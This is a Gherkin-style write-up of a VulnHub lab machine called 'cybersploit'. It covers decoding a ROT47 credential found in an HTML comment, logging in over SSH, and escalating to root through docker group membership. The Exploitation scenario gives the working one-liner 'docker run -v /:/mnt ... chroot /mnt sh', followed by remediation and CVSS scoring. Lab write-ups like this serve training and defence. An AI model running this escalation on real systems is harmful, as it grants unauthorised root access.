## Version 1.4.1
## language: en

Feature:
  TOE:
    vulnhub
  Location:
    http://cybersploit
  CWE:
    CWE-288: Authentication Bypass Using an Alternate Path or Channel
  Rule:
    REQ.R122: R122. Validate credential ownership
  Goal:
    Gain root access
  Recommendation:
    Manage docker group members and permissions

  Background:
  Hacker's software:
    | <Software name> |  <Version>  |
    | Debian          |   stretch   |
    | Chrome          |80.0.3987.122|
    | netdiscover     |  0.3-beta7  |
    | nmap            |    7.40     |
  TOE information:
    Given I am accessing the site 192.168.1.16
    And I added "cybersploit" to my "cybersploit" file
    """
    192.168.1.16    cybersploit    cybersploit
    """
    And is running on CentOS Linux 8 and kernel 4.18.0
    And is on VirtualBox


  Scenario: Normal use case
    Given I access "cybersploit" I see a list of of users
    And I can read their username

  Scenario: Static detection
    Given I just have access to the html code
    And I notice that a user has a name with random characters
    Then I inspect the source code of the page
    And at the bottom I find a comment:
    """
    <!----------ROT47---------->
    """

  Scenario: Dynamic detection
    Given that I wasn't able to access the source code
    And that that I have some random characters and a encoding method
    Then I procede to decode it
    And I acquire a user and password combiantion
    Then I log in through "ssh"

  Scenario: Exploitation
    Given that I have access to the system
    Then I execute the following command:
    """
    $ id
    """
    Then I get the output:
    """
    uid=1001(shailendra) gid=1001(shailendra)
    groups=1001(shailendra),991(docker)
    """
    Then I see that the user can execute docker commands
    Then I execute the following line in the shell:
    """
    $ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
    """
    And I have gained root access

  Scenario: Remediation
    Given well manage of group members and permissions

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.8/10 (High) - AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H
  Temporal: Attributes that measure the exploit's popularity and fixability
    8.2/10 (High) - E:H/RL:U/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    8.2/10 (High) - CR:H/IR:H/AR:H

  Scenario: Correlations
    No correlations have been found to this date {2020-08-12}
